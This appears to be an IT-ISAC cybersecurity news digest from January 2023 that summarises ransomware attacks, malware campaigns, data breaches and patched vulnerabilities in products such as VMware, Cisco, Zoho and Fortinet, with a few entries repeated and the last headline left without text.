    The IT-ISAC operations team informed the membership of an ongoing bug in VMWare products. Fortunately, the company quickly acknowledged and released patches to address four security vulnerabilities in its vRealize log analysis tool last week. Two of these were rated critical in terms of severity using the CVSS scale, as successful exploitation could allow attackers to execute code remotely on compromised devices.

    Attackers Used Malicious “verified” OAuth Apps to Infiltrate Organizations’ O365 Email Accounts

    Malicious third-party OAuth apps with an evident “Publisher identity verified” badge have been used by unknown attackers to target organizations in the UK and Ireland, Microsoft has shared. The attacks were first spotted by Proofpoint researchers in early December 2022, and involved three rogue apps impersonating SSO and online meeting apps. Targets in these organizations who have fallen for the trick effectively allowed these rogue apps to access to their O365 email accounts and infiltrate organizations’ cloud environments” (Help Net Security, 2023). “The potential impact to organizations includes compromised user accounts, data exfiltration, brand abuse of impersonated organizations, business email compromise (BEC) fraud, and mailbox abuse,” Proofpoint researchers explained.

    Shady Reward Apps on Google Play Amass 20 Million Downloads

    Recently, in the Android app store, there has been an uptick in downloading activity-tracking applications. The applications advertise themselves as health-tracking apps such as pedometers, good-habit building apps, and health apps. These apps incentivize users to reach their goals on the app by promising users rewards. "According to a report by the Dr. Web antivirus, though, the rewards may be impossible to cash out or are only made available partially after forcing users to watch a large number of advertisements.
    (Lucky Step – Walking Tracker – 10 million downloads WalkingJoy – 5 million downloads Lucky Habit: health tracker – 5 million downloads )

    Ukraine: Sandworm Hackers Hit News Agency With 5 Data Wipers

    In a recent announcement from the Ukrainian Computer Emergency Response Team (CERT-UA), the agency stated that 5 different wiper malware were deployed on the network of Ukraine’s national news agency (Ukrinform) on January 17th. According to CERT-UA, “5 samples of malicious programs (scripts) were detected, the functionality of which is aimed at violating the integrity and availability of information (writing files/disks with zero bytes/arbitrary data and their subsequent deletion).” The list of wipers deployed includes:

    • CaddyWiper (Windows)
    • ZeroWipe (Windows)
    • SDelete (Windows)
    • AwfulShred (Linux)
    • BidSwipe (FreeBSD)
    The threat actors allegedly deployed the wiper strains by creating a Windows group policy, suggesting that they had breached the news agency’s network beforehand. CERT-UA says that the actors gained remote access to Ukrinform’s network on December 7th, waiting a month to deploy the destructive malware. The attack was a partial success, with the wipers only managing to destroy files on a limited number of data storage systems. As such Ukrinform was able to continue its operations without any issues.

    Titan Stealer: A New Golang-Based Information Stealer Malware Emerges

    Researchers at Uptycs uncovered a new Golang-based information stealer malware dubbed Titan Stealer which is being advertised by threat actors on Telegram. Titan Stealer is being advertised as a builder, enabling buyers to customize the malware binary to include specific functionalities and the kind of data to be exfiltrated from victim’s system. According to researchers, Titan Stealer is capable of stealing credentials from browsers and crypto wallets, FTP client details, screenshots, system information, grabbed files, and much more. Browsers targeted by the info stealer include Google Chrome, Mozilla Firefox, Microsoft Edge, Yandex, Opera, Brave, Vivaldi, 7 Star Browser, Iridium Browser, and others. Titan also targets crypto wallets like Armory, Armory, Bytecoin, Coinomi, Edge Wallet, Ethereum, Exodus, Guarda, Jaxx Liberty, and Zcash.

    Massive Microsoft 365 Outage Caused by WAN Router IP Change

    Microsoft says this week's five-hour-long Microsoft 365 worldwide outage was caused by a router IP address change that led to packet forwarding issues between all other routers in its Wide Area Network (WAN). Redmond said that the outage resulted from DNS and WAN networking configuration issues caused by a WAN update and that users across all regions serviced by the impacted infrastructure were having problems accessing the affected Microsoft 365 services. The issue led to service impact in waves, peaking approximately every 30 minutes as shared on the Microsoft Azure service status page (this status page was also affected as it intermittently displayed "504 Gateway Time-out" errors.

    Researchers to Release VMware vRealize Log RCE Exploit, Patch Now

    Security researchers with Horizon3's Attack Team will release an exploit targeting a vulnerability chain next week for gaining remote code execution on unpatched VMware vRealize Log Insight appliances. Now known as VMware Aria Operations for Logs, vRealize Log Insight makes it easier for VMware admins to analyze and manage terabytes of infrastructure and application logs.

    New Mimic Ransomware Abuses ‘Everything’ Windows Search Tool

    Security researchers discovered a new ransomware strain they named Mimic that leverages the APIs of the 'Everything' file search tool for Windows to look for files targeted for encryption. Discovered in June 2022 by researchers at cybersecurity company Trend Micro, the malware appears to target mainly English and Russian-speaking users. Some of the code in Mimic shares similarities with Conti ransomware, the source of which was leaked in March 2022 by a Ukrainian researcher.

    Bitwarden Password Vaults Targeted in Google Ads Phishing Attack

    Bitwarden and other password managers are being targeted in Google ads phishing campaigns to steal users' password vault credentials. As the enterprise and consumers move to use unique passwords at every site, it has become essential to use password managers to keep track of all the passwords. However, unless you use a local password manager, like KeePass, most password managers are cloud-based, allowing users to access their passwords through websites and mobile apps. These passwords are stored in the cloud in "password vaults" that keep the data in an encrypted format, usually encrypted using users' master passwords.

    Lexmark Warns of RCE Bug Affecting 100 Printer Models, POC Released

    Lexmark has released a security firmware update to fix a severe vulnerability that could enable remote code execution (RCE) on more than 100 printer models. The security issue is tracked as CVE-2023-23560 and, according to the company, it has a severity rating of 9.0. It is a server-side request forgery (SSRF) in the Web Services feature of Lexmark devices.

    Hive Ransomware Dark Web Sites Seized by Law Enforcement

    Today, the Hive ransomware Tor payment and data leak sites were seized as part of an international law enforcement operation involving the US Department of Justice, FBI, Secret Service, Europol, and Germany's BKA and Polizei. The seizure notice on the Tor sites also lists a wide range of other countries involved in the law enforcement operation, including Canada, France, Lithuania, Netherlands, Norway, Portugal, Romania, Spain, Sweden, and the United Kingdom. Unlike previous seizure messages used by law enforcement, this image is an animated GIF rotating between a message in English and Russian, likely to be a warning for other ransomware gangs.

    Exploit Released for Critical Windows CryptoAPI Spoofing Bug

    Researchers at Akamai published proof-of-concept exploit code for a critical Windows CryptoAPI vulnerability (CVE-2022-34689) discovered by the NSA and U.K.'s NCSC allowing MD5-collision certificate spoofing. “CryptoAPI is the de facto API in Windows for handling anything related to cryptography. In particular, it handles certificates — from reading and parsing them to validating them against verified certificate authorities (CAs). Browsers also use CryptoAPI for TLS certificate validation — a process that results in the lock icon everyone is taught to check.

    CISA: Federal Agencies Hacked Using Legitimate Remote Desktop Tools in Callback Attacks.

    The IT-ISAC distributed an attachment in our daily report yesterday detailing how threat actors currently use RMM (Remote Monitoring and Management) tools for malicious purposes. CISA discovered malicious activity within the networks of multiple federal civilian executive branch (FCEB) agencies using the EINSTEIN intrusion detection system after releasing a Silent Push report in mid-October 2022.

    Experts Warn of a Surge of Attacks Exploiting a Realtek Jungle SDK RCE (CVE-2021-35394)

    Palo Alto Networks researchers reported that between August and October 2022 the number of attacks that attempted to exploit a Realtek Jungle SDK RCE (CVE-2021-35394) (CVSS score 9.8) accounted for more than 40% of the total number of attacks (Security Affairs, 2023). “Realtek Jungle SDK version v2.x up to v3.4.14B provides a diagnostic tool called ‘MP Daemon’ that is usually compiled as ‘UDPServer’ binary. The binary is affected by multiple memory corruption vulnerabilities and an arbitrary command injection vulnerability that can be exploited by remote unauthenticated attackers.” reads the description for this flaw.

    Zacks Investment Research Data Breach Affects 820,000 Clients

    Zacks, an investment research company, fell victim to a data breach last year on December 28, 2022. Zack learned that an unknown third party had gained unauthorized access to customer records. They are one of the largest providers of independent stock, ETF, and mutual fund research in the United States. Their services include aiding investors with; stock buying decisions using financial data analytics. The data breach affected 820,000 users. The specific dataset that was apprehended consisted of Zack's Elite customers who joined between November 1999 and February 2005. The information included; in the data set consists of names, addresses, phone numbers, email addresses, and passwords used for Zacks.com. The research firm has found no evidence that any financial data had been; abstracted.

    CISA: Federal Agencies Hacked Using Legitimate Remote Desktop Tools in Callback Attacks.

    The IT-ISAC distributed an attachment in our daily report yesterday detailing how threat actors currently use RMM (Remote Monitoring and Management) tools for malicious purposes. CISA discovered malicious activity within the networks of multiple federal civilian executive branch (FCEB) agencies using the EINSTEIN intrusion detection system after releasing a Silent Push report in mid-October 2022.

    Multiple Vulnerabilities in Google Chrome Could Allow for Arbitrary Code Execution

    Multiple vulnerabilities have been discovered in Google Chrome, the most severe of which could allow for arbitrary code execution. Successful exploitation of the most powerful of these vulnerabilities could allow for arbitrary code execution in the context of the logged-on user. Depending on the user's privileges, an attacker could install programs; view, change, or delete data; or create new accounts with full user rights. Users whose accounts are configured to have fewer user rights on the system could be less impacted than those with administrative user rights.

    Ransomware Access Brokers Use Google Ads to Breach Your Network

    Researchers have discovered a new advertising campaign. DEV-0569 is responsible. The campaign utilizes Google Ads to spread malware, steal passwords, and breach networks for ransomware attacks. "Over the past couple of weeks, cybersecurity researchers MalwareHunterTeam, Germán Fernández, and Will Dormann have illustrated how Google search results have become a hotbed of malicious advertisements pushing malware. These ads pretend to be websites for popular software programs, like LightShot, Rufus, 7-Zip, FileZilla, LibreOffice, AnyDesk, Awesome Miner, TradingView, WinRAR, and VLC.

    VMware Fixes Critical Security Bugs in vRealize Log Analysis Tool

    On Tuesday, VMware addressed several vulnerabilities impacting its vRealize Log Insight, a log analysis and management tool. Two of the flaws have been rated critical in severity (CVSS: 9.8) and are tracked as CVE-2022-31703 and CVE-2022-31704. CVE-2022-31703 is related to a directory traversal vulnerability that can be leveraged for remote code execution (RCE) by injecting files into the operating system of impacted appliances. The other critical flaw, CVE-2022-31704 relates to a broken access control bug which can also be abused for RCE using a similar method.

    North Korean Hackers Turn to Credential Harvesting in Latest Wave of Cyberattacks Summary:

    A North Korean nation-state group notorious for crypto heists has been attributed to a new wave of malicious email attacks as part of a "sprawling" credential harvesting activity targeting a number of industry verticals, marking a significant shift in its strategy. The state-aligned threat actor is being tracked by Proofpoint under the name TA444, and by the larger cybersecurity community as APT38, BlueNoroff, Copernicium, and Stardust Chollima. TA444 is ‘utilizing a wider variety of delivery methods and payloads alongside blockchain-related lures, fake job opportunities at prestigious firms, and salary adjustments to ensnare victims,’ the enterprise security firm said in a report.

    Apple Fixes Actively Exploited iOS Zero-Day on Older iPhones, iPads

    Apple recently backported fixes for older iPhones and iPads to address a remotely exploitable zero-day vulnerability that was disclosed last month. Tracked as CVE-2022-42856, the vulnerability is related to a type confusion weakness in Apple’s Webkit web browsing engine. A malicious threat can exploit the weakness to perform arbitrary code execution by tricking victims into visiting a maliciously crafted website under the attacker’s control.

    Emotet Malware Makes a Comeback with New Evasion Techniques

    The Emotet malware operation has continued to refine its tactics in an effort to fly under the radar, while also acting as a conduit for other dangerous malware such as Bumblebee and IcedID. Attributed to a cybercrime group tracked as TA542 (aka Gold Crestwood or Mummy Spider), the virus has evolved from a banking trojan to a malware distributor since its first appearance in 2014. The malware-as-a-service (MaaS) is also modular, capable of deploying an array of proprietary and freeware components that can exfiltrate sensitive information from compromised machines and carry out other post-exploitation activities.

    Hackers Use Golang Source Code Interpreter to Evade Detection

    Researchers have witnessed a Chinese-speaking hacking group dubbed Dragon Spark. "The attacks are tracked by SentinelLabs, whose researchers report that DragonSpark relies on a little-known open-source tool called SparkRAT to steal sensitive data from compromised systems, execute commands, perform lateral network movement, and more. The threat actors leverage compromised infrastructure in China, Taiwan, and Singapore to launch their attacks, while the intrusion vector observed by SentinelLabs is vulnerable MySQL database servers exposed online.

    CISA added Zoho ManageEngine RCE (CVE-2022-47966) to its Known Exploited Vulnerabilities Catalog

    We reported on this vulnerability throughout the last couple of weeks and urged companies to ensure that they’re patched, as POC was set to be released. CISA added the Zoho ManageEngine remote code execution flaw (CVE-2022-47966) to its Known Exploited Vulnerabilities Catalog. CVE-2022-47966 allows attackers to execute code remotely on vulnerable products without authentications. The bug impacts multiple Zoho products where SAML SSO is enabled in the ManageEngine configurations. The issue also affects products that had the feature enabled in the past. The company addressed the vulnerability on October 27, 2022.

    Fanduels Warns of Data Breach After Customer Info Stolen in Vendor Hack

    The FanDuel sportsbook and betting site is warning customers that their names and email addresses were exposed in a January 2023 MailChimp security breach, urging users to remain vigilant against phishing emails. On January 13th, MailChimp confirmed they suffered a breach after hackers stole an employee's credentials using a social engineering attack. Using these credentials, the threat actors accessed an internal MailChimp customer support and administration tool to steal the "audience data" for 133 customers.

    Over 19,000 End-of-life Cisco Routers Exposed to RCE Attacks

    Over 19,000 end-of-life Cisco VPN routers on the Internet are exposed to attacks targeting a remote command execution exploit chain. By chaining two security flaws disclosed last week, threat actors can bypass authentication (CVE-2023-20025) and execute arbitrary commands (CVE-2023-2002) on the underlying operating system of Cisco Small Business RV016, RV042, RV042G, and RV082 routers.

    New Boldmove Linux Malware Used to Backdoor Fortinet Devices

    Last month, Fortinet disclosed a vulnerability in FortiOS SSL-VPN, warning customers to patch their appliances as attackers were observed exploiting it in the wild. The vulnerability tracked as CVE-2022-42475, relates to a heap-based buffer overflow in FortiOS SSL-VPN which could enable unauthenticated threat actors to execute arbitrary code and commands via specifically crafted requests. Fortinet silently fixed the bug in November, but didn’t publicly disclose details of the vulnerability until December. At the time, the company stated that it was aware of active exploitation surrounding this flaw but no further details were provided. Recently, Mandiant released a blog post, stating that suspected Chinese hackers exploited the flaw as a zero-day in December to target a European government and an African MSP and deploy a custom malware, dubbed Boldmove.

    Riot Games Hacked, Delays Game Patches After Security Breach

    The video game developer Riot Games, recognized for publishing games such as League of Legends and Valorant, has been hacked. "The LA-based game publisher disclosed the incident in a Twitter thread on Friday night and promised to keep customers up-to-date with whatever an ongoing investigation discovers. " (Bleeping Computer, 2023). The company has stated that its development environment had been a victim of a social engineering attack. Multiple development teams have confirmed the security breach, including the League of Legends development team and Teamfight Tactics. However, there has been no indication that player data or personal information was compromised. One consequence of the attack; is Riot Games will be unable to release content leading to delays in the anticipated release date of the next major patch. The company's head of studio released a statement explaining that there will be no changes in the release plan of Patch 13.2; however, aspects of Patch 13.2 have the possibility of being moved to Patch 13.3, which debuts on February 8. The league team is attempting to hotfix what they can to deliver the planned and tested balance changes on time.

    Over 19,000 End-of-life Cisco Routers Exposed to RCE Attacks

    Over 19,000 end-of-life Cisco VPN routers on the Internet are exposed to attacks targeting a remote command execution exploit chain. By chaining two security flaws disclosed last week, threat actors can bypass authentication (CVE-2023-20025) and execute arbitrary commands (CVE-2023-2002) on the underlying operating system of Cisco Small Business RV016, RV042, RV042G, and RV082 routers.

    Roaming Mantis’ Android Malware Adds DNS Changer to Hack Wi-Fi Routers

    The Roaming Mantis malware distribution campaign has updated its Android malware to include a DNS changer that modifies DNS settings on vulnerable Wi-Fi routers to spread the infection to other devices. Starting in September 2022, researchers observed the 'Roaming Mantis' credential theft and malware distribution campaign using a new version of the Wroba.o/XLoader Android malware that detects vulnerable Wi-Fi routers based on their model and changes their DNS. The malware then creates an HTTP request to hijack a vulnerable Wi-Fi router's DNS settings, causing connected devices to be rerouted to malicious web pages hosting phishing forms or dropping Android malware.

    Ransomware Gang Steals Data From KFC, Taco Bell, and Pizza Hut Brand Owner

    Yum! Brands, the fast food brand operator of KFC, Pizza Hut, Taco Bell, and The Habit Burger Grill fast-food restaurant chains, has been targeted by a ransomware attack that forced the closure of 300 locations in the United Kingdom. Yum! Brands operates 53,000 restaurants across 155 countries and territories, with over $5 billion in total assets and $1.3 billion in yearly net profit.

    New 'Hook' Android Malware Lets Hackers Remotely Control Your Phone

    A new Android malware named 'Hook' is being sold by cybercriminals, boasting it can remotely take over mobile devices in real-time using VNC (virtual network computing). The new malware is promoted by the creator of Ermac, an Android banking trojan selling for $5,000/month that helps threat actors steal credentials from over 467 banking and crypto apps via overlaid login pages. While the author of Hook claims the new malware was written from scratch, and despite having several additional features compared to Ermac, researchers at ThreatFabric dispute these claims and report seeing extensive code overlaps between the two families. ThreatFabric explains that Hook contains most of Ermac's code base, so it's still a banking trojan. At the same time, it includes several unnecessary parts found in the older strain that indicate it re-used code in bulk.

    Google Ads Increasingly Pointing to Malware

    The FBI has recently warned the public about search engine ads pushing malware disguised as legitimate software – an old tactic that has lately resulted in too many malicious ads served to users searching for software, cracked software, drivers – anything that can be downloaded, really – via Google and Bing. Recently there has been an noticeable uptick in malicious ads being served by popular search engines. Mimicking popular open source tools via typosquatted domains, threat actors are luring victims into search engine ad links. HP threat researcher Patrick Schläpfer says that they have seen “a significant increase in malware distributed through malvertising, with multiple threat actors currently using this technique.

    New ‘Blank Image’ Attack Hides Phishing Scripts in SVG Files

    Researchers identified a new phishing campaign known as “Blank Image”. The blank image attack was; observed in the wild. Where the technique used was to conceal empty SVG files inside HTML attachments impersonating DocuSign documents. The phishing email is sent, to proposed victims, as a document from DocuSign. Next, the recipient is; prompted to review and sign the document named "Scanned Remittance Advice[.]htm". However, if the receiver chooses the "View Completed Document" option, they are then directed to a legitimate DocuSign webpage. Be that as it may, if the user sets out to open the HTML attachment, then the ‘Blank Image’ attack commences.

    T-Mobile Hacked to Steal Data of 37 Million Accounts in API Data Breach

    T-Mobile disclosed a new data breach after a threat actor stole the personal information of 37 million current postpaid and prepaid customer accounts through one of its Application Programming Interfaces (APIs). While T-Mobile did not share how their API was exploited, threat actors commonly find flaws that allow them to retrieve data without authenticating first.

    Ukraine Links Data-Wiping Attack on News Agency to Russian Hackers

    Ukraine’s Computer Emergency Response Team recently linked a cyberattack targeting the country’s national news agency (Ukinform) to Sandworm, a group of Russian military hackers. It is currently unknown how the attackers breached the news agency’s network. However after gaining an initial foothold, CaddyWiper, a destructive wiper malware was launched onto the agency’s systems via the Windows group policy (GPO). CERT-U notes this type of attack chain is similar to that of Sandworm, whose activities are linked to the Russian Federation. In April 2022, Sandworm was observed using CaddyWiper against a large Ukrainian energy provider.

    A Couple of Bugs Can be Chained to Hack Netcomm Routers

    The vulnerabilities discovered in the Netcomm routers are a a stack based buffer overflow and an authentication bypass, respectively tracked as CVE-2022-4873 and CVE-2022-4874. Both issues impact the Netcomm router models NF20MESH, NF20, and NL1902 running software versions earlier than R6B035.

    Illegal Solaris Darknet Market Hijacked by Competitor Kraken

    Solaris, a large darknet marketplace focused on drugs and illegal substances, has been taken over by a smaller competitor named 'Kraken,' who claims to have hacked it on January 13, 2022. The Tor site of Solaris currently redirects to Kraken, while blockchain monitoring experts at Elliptic report no movements in the cryptocurrency addresses associated with the site after January 13, 2022.

    Avast Releases Free Bianlian Ransomware Decryptor

    Avast has released a free decryptor for the BianLian ransomware strain to help victims of the malware recover locked files without paying the hackers for a decryption key. The availability of a decryptor comes only about half a year after increased activity from BianLian ransomware over the summer of 2022 when the threat group breached multiple high-profile organizations.

    1,000 Ships Impacted by a Ransomware Attack on Maritime Software Supplier DNV

    A ransomware attack against the maritime software supplier DNV impacted approximately 1,000 vessels. About 1,000 vessels have been impacted by a ransomware attack against DNV, one of the major maritime software suppliers. DNV GL provides solutions and services throughout the life cycle of any vessel, from design and engineering to risk assessment and ship management. The Norwegian company provides services for 13,175 vessels and mobile offshore units (MOUs) amounting to 265.4 million gross tonnes, which represents a global market share of 21%.

    Over 4,000 Sophos Firewall Devices Vulnerable to RCE Attacks

    In September 2022, Sophos released an advisory warning its customers of a critical remote code execution vulnerability (CVE-2022-3236) impacting its Sophos Firewall Webadmin and User Portal HTTP interfaces. Hotfixes were released in September for the impacted Firewall versions (v19.0 MR1 (19.0.1) and older), with official fixes being issued three months later in December 2022. According to a new report by VulnCheck vulnerability researcher Jacob Baines, out of more than 88,000 instances, around 6% or more than 4,000 are still running versions that haven't received a hotfix and are vulnerable to CVE-2022-3236 attacks.

    Iranian Government Entities Under Attack by New Wave of BackdoorDiplomacy Attacks

    The threat actor known as BackdoorDiplomacy has been linked to a new wave of attacks targeting Iranian government entities between July and late December 2022. Palo Alto Networks Unit 42, which is tracking the activity under its constellation-themed moniker Playful Taurus, said it observed the government domains attempting to connect to malware infrastructure previously identified as associated with the adversary. Also known by the names APT15, KeChang, NICKEL, and Vixen Panda, the Chinese APT group has a history of cyber espionage campaigns aimed at government and diplomatic entities across North America, South America, Africa, and the Middle East at least since 2010.

    SecurityScorecard: Almost Half of Critical Manufacturing at Risk of Breach

    According to new research from SecurityScorecard titled “Addressing the Trust Deficit In Critical Infrastructure”, published on January 18, 2023. nearly half (48%) of critical manufacturing organizations are vulnerable to a breach. The report analyzed the current state of cyber resilience in the critical infrastructure sectors such as energy, chemical, healthcare, and others, as designated by the Cybersecurity and Infrastructure Security Agency (CISA). As part of the report, the 48% of the organizations analyzed received a rating of ”C”, “D” or “F” on SecurityScorecard’s security ratings platform. Security Scorecard says organizations with an “A” rating are 7.7 times less likely to sustain a breach that those with an “F” rating.

    Malware Attack on CircleCI Engineer's Laptop Leads to Recent Security Incident

    On Friday, DevOps CircleCI disclosed that one of its engineers became infected with an info-stealing malware capable of stealing two-factor authentication-backed credentials, enabling threat actors to breach the company’s systems and data. CircleCI says the attack took place on December 16, 2022, and that the malware was able to go undetected by its antivirus software. According to CircleCI’s chief technology officer, Rob Zuber the malware was able to execute session cookie theft, enabling the attackers to impersonate the targeted employee in a remote location, and then escalate access to a subset of the company’s production systems. From here, the threat actors used the elevated privileges to steal data from the company’s database, which included customer environment variables, tokens, and keys. Although the data stolen was encrypted at rest, Zuber stated that the actors extracted encryption keys from a running process, enabling them to potentially access the encrypted data.

    Hackers Exploit Cacti Critical Bug to Install Malware, Open Reverse Shells

    In early December 2022, a security advisory warned of a critical command injection vulnerability (tracked as CVE-2022-46169, severity rating 9.8 out of 10) in Cacti that could be exploited without authentication. Cacti is an operational and fault management monitoring solution for network devices that also provides graphical visualization. There are thousands of instances deployed across the world exposed on the web” (Bleeping Computer, 2023). Although the developer released an update for the flaw, there are currently more than 1,600 instances vulnerable to CVE-2022-46169, that hackers have already started to exploit.

    Fortinet Observed Three Rogue PyPI Packages Spreading Malware

    Researchers at Fortinet recently discovered three malicious PyPI packages on January 10, 2023. These three packages are named “colorslib”, “httpslib”, and “libhttps”. All three packages were uploaded by the same actor, and have been downloaded a total of 550 times. The packages include complete descriptions, and they do not mimic the names of other projects; because of this developers are deceived into believing these packages are general resources with risk free-code. Nevertheless, the packages are capable of dropping info-stealing malware on developer systems.

    T95 Android TV Box Sold on Amazon Hides Sophisticated Malware

    Security researcher, Daniel Milisic, discovered that the T95 Android TV box he purchased on Amazon was infected with sophisticated pre-installed malware. This Android TV box model is available on Amazon and AliExpress for as low as $40. The device came with Android 10 (with working Play store) and an Allwinner H616 processor. Milisic purchased the T95 Android TV box to run Pi-hole, which is a Linux network-level advertisement and Internet tracker blocking application.

    Researchers to Release POC Exploit for Critical Zoho RCE Bug, Patch Now

    It twas on Friday that security researchers with Horizon3's Attack Team warned admins that they created a proof-of-concept (POC) exploit for CVE-2022-47966. According to researchers, the vulnerability could be leveraged in 'spray and pray' attacks across the internet since remote code execution at NT AUTHORITY\SYSTEM which essentially gives an attacker complete control over the system. Vulnerable software versions include almost all ManageEngine products. Fortunately, Zoho has already patched the bugs in waves which started on October 27, 2022, by updating third-party modules to a more recent version.

    IcedID Malware Strikes Again: Active Directory Domain Compromised in Under 24 Hours

    A recent IcedID malware attack enabled the threat actor to compromise the Active Directory domain of an unnamed target less than 24 hours after gaining initial access, while also borrowing techniques from other groups like Conti to meet its goals. ‘Throughout the attack, the attacker followed a routine of recon commands, credential theft, lateral movement by abusing Windows protocols, and executing Cobalt Strike on the newly compromised host,’ Cybereason researchers said in a report published this week.

    Microsoft: Cuba Ransomware Hacking Exchange Servers via OWASSRF Flaw

    Microsoft says Cuba ransomware threat actors are hacking Microsoft Exchange servers unpatched against a critical server-side request forgery (SSRF) vulnerability also exploited in Play ransomware attacks. Cloud computing provider Rackspace recently confirmed that Play ransomware used a zero-day exploit dubbed OWASSRF targeting this bug (CVE-2022-41080) to compromise unpatched Microsoft Exchange servers on its network after bypassing ProxyNotShell URL rewrite mitigations. According to Microsoft, the Play ransomware gang has abused this security flaw since late November 2022. The company advises customers to prioritize CVE-2022-41080 patching to block potential attacks. Redmond says that this SSRF vulnerability has also been exploited since at least November 17th by another threat group it tracks as DEV-0671 to hack Exchange servers and deploy Cuba ransomware payloads.

    RAT Malware Campaign Tries to Evade Detection Using Polyglot Files

    Operators of the StrRAT and Ratty remote access trojans (RAT) are running a new campaign using polyglot MSI/JAR and CAB/JAR files to evade detection from security tools. The campaign was spotted by Deep Instinct, which reports that the threat actors achieve moderate success in evading detection by anti-virus engines. This is notable considering how old and well-documented the two particular RATs are.

    Hackers Exploit Control Web Panel Flaw to Open Reverse Shells

    A recently patched vulnerability in Control Web Panel (CWP), a tool for managing servers formerly known as CentOS Web Panel, is being leveraged in cyberattacks. The security vulnerability in question is being identified as CVE-2022-44877, which received a critical severity score of 9.8 out of 10. An attacker could execute code remotely without authentication on unpatched instances. It twas on January 3rd when researcher Numan Türle at Gais Cyber Security, who initially reported the issue around October last year, published a proof-of-concept (POC) exploit with a video demonstrating how the exploit works. After the release of the POC, it was only three days later when security researchers noticed hackers using the flaw to get remote access to unpatched systems and to find more vulnerable machines.

    Royal Mail Cyberattack Linked to Lockbit Ransomware Operation

    Royal Mail, UK's largest mail delivery service, disclosed yesterday that they suffered and were recovering from a callous cyber attack. The attribute was initially unknown; however, today, reports suggest that the Lock bit Ransomware operators are responsible for the blitz that the left organization's computer systems immedicable. As a result, the company's shipping and logistics services were reposed, severely halting business operations, “Royal Mail is experiencing severe service disruption to our international export services following a cyber incident," disclosed Royal Mail in its service update.

    Cisco Warns of Auth Bypass Bug With Public Exploit in EoL Routers

    On Wednesday, Cisco published an advisory to warn customers of several vulnerabilities impacting its end-of-life VPN routers. The first flaw, which is being tracked as CVE-2023-20025 (CVSS score: 9.0), is related to an authentication bypass vulnerability in the web-based management interface of Cisco Small Business RV016, RV042, RV042G, RV082 Routers. Cisco says the flaw is due to improper validation of user input within incoming HTTP packets and can be exploited by sending specially crafted HTTP requests to the web-based management interface. Upon successful exploitation, a malicious threat actor could bypass authentication and gain root access to the targeted system.

    New Analysis Reveals Raspberry Robin Can be Repurposed by Other Threat Actors

    A new analysis of Raspberry Robin's attack infrastructure has revealed that it's possible for other threat actors to repurpose the infections for their own malicious activities, making it an even more potent threat. Raspberry Robin (aka QNAP worm), attributed to a threat actor dubbed DEV-0856, is a malware that has increasingly come under the radar for being used in attacks aimed at finance, government, insurance, and telecom entities. Given its use by multiple threat actors to drop a wide range of payloads such as SocGholish, Bumblebee, TrueBot, IcedID, and LockBit ransomware, it's believed to be a pay-per-install (PPI) botnet capable of serving next-stage malware.

    New Analysis Reveals Raspberry Robin Can be Repurposed by Other Threat Actors

    A new analysis of Raspberry Robin's attack infrastructure has revealed that it's possible for other threat actors to repurpose the infections for their own malicious activities, making it an even more potent threat. Raspberry Robin (aka QNAP worm), attributed to a threat actor dubbed DEV-0856, is a malware that has increasingly come under the radar for being used in attacks aimed at finance, government, insurance, and telecom entities. Given its use by multiple threat actors to drop a wide range of payloads such as SocGholish, Bumblebee, TrueBot, IcedID, and LockBit ransomware, it's believed to be a pay-per-install (PPI) botnet capable of serving next-stage malware.

    Aflac, Zurich Policyholders in Japan Affected by Data Leaks

    Personal information for more than 1.3 million Aflac cancer insurance and almost 760,000 Zurich Insurance auto insurance policy holders is on the dark web following a hack on a third-party contractor. Neither company named the data leak site or third-party vendor involved with its breaches, so it is unclear if both incidents are related. Affected individuals from both hacks reside in Japan, "The incident, caused by a vulnerability in a file transfer server, originated with a subcontractor of a third-party vendor that Aflac Japan uses for marketing purposes. The data, which did not include personally identifiable information was posted on a dark website. This incident was confined to Aflac Japan and did not involve data related to U.S. operations or customers.

    Scattered Spider Hackers Use Old Intel Driver to Bypass Security

    CrowdStrike reports that the Scattered Spider threat actor was seen attempting to exploit CVE-2015-2291, a high-severity vulnerability in the Intel Ethernet diagnostics driver that allows an attacker to execute arbitrary code with kernel privileges using specially crafted calls. Although the aforementioned CVE was fixed in 2015, by planting an older, still vulnerable version on the breached devices, the threat actors can leverage the flaw no matter what updates the victim has applied to the system.

    Gootkit Malware Abuses VLC to Infect Healthcare Orgs with Cobalt Strike

    The Gootkit loader malware operators are running a new SEO poisoning campaign that abuses VLC Media Player to infect Australian healthcare entities with Cobalt Strike beacons. The campaigns goal is to deploy the Cobalt Strike post-exploitation toolkit on infected devices for initial access to corporate networks. From there, the remote operators can perform network scans, move laterally throughout the network, steal account credentials and files, and deploy more dangerous payloads such as ransomware.

    New Dark Pink Apt Group Targets Govt and Military With Custom Malware

    Attacks targeting government agencies and military bodies in multiple countries in the APAC region have been attributed to what appears to be a new advanced threat actor that leverages custom malware to steal confidential information. Security researchers are referring to this group as Dark Pink (Group-IB) or Saaiwc Group (Anheng Hunting Labs), noting that it employs uncommon tactics, techniques, and procedures.

    Lorenz Ransomware Gang Plants Backdoors to Use Months Later

    Security researchers are warning that patching critical vulnerabilities allowing access to the network is insufficient to defend against ransomware attacks. Some gangs are exploiting the flaws to plan a backdoor while the window of opportunity exists and may return long after the victim applied the necessary security updates. One case is a Lorenz ransomware attack that reached completion months after the hackers gained access to the victim's network using an exploit for a critical bug in a telephony system. During an incident response engagement to a Lorenz ransomware attack, researchers at global intelligence and cyber security consulting company S-RM determined that the hackers had breached the victim network five months before starting to move laterally, steal data, and encrypt systems.

    Microsoft January 2023 Patch Tuesday fixes 98 flaws, 1 Zero-Day

    As part of the January 2023 Patch Tuesday, Microsoft addressed 98 flaws, including a zero-day that is actively being exploited in attacks. Of the 98 flaws fixed, there was 39 Elevation of Privilege Vulnerabilities, 4 Security Feature Bypass Vulnerabilities, 33 Remote Code Execution Vulnerabilities, 10 Information Disclosure Vulnerabilities, 10 Denial of Service Vulnerabilities, and 2 Spoofing Vulnerabilities. 11 of the vulnerabilities are rated critical in severity, most of which relate to remote code execution and privilege escalation.

    StrongPity Hackers Target Android Users via Trojanized Telegram App

